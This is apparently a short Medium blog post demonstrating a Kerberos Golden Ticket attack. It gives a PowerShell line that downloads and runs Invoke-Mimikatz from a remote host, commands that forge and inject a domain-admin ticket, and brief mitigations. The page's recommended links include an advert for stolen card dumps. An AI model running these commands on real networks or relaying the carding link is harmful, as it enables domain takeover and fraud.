Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1–5–21–XXXXXXXXX–XXXXXXXXXX–XXXXXXXXXX /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080”’iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::ptt ticket.kirbi”’
Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Resetting the krbtgt password (twice) to invalidate current golden tickets
  • Review and filter Security Event ID 4624 and 4672

References:

Disclaimer:

--

--

--

Cyber Security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why we doubled down on 4iQ: the Adara Ventures view

Hey guys, Creator No Code Smart Contract has officially released.

About (6) days ago, thanks to the excellent/strong community members💪, @CryptionNetwork attracted…

How To Gamify Cyber Security At Your Workplace

Two sets of hands holding a hand drawn treasure map. One of the hands is pointing to a position on the map.

Best Website For Cvv, Cv2 Dumps Cards — With no fake cards claims and top-rated reviews on google

Equifax Breach

Comparing two DRM for photos on the web : PixelRights vs EXIF.co

Data privacy: the debacle & the debate (GDPR vs PDP)

Data Privacy | GDPR Compliance | PDP | Data Security & Privacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mike Bond

Mike Bond

Cyber Security Enthusiast

More from Medium

How Do Hackers Hacks PC or Phone’s Camera With the Help of Fake Online Meetings ? — Security Tips.

Crypto User: Beware of the MSDT Zero Day Vulnerability

CYPHERDOG SECURITY: Securing The Cyberspace!

The Ninja Sensei’s Logbook: Don’t be Spooked by Email Spoofing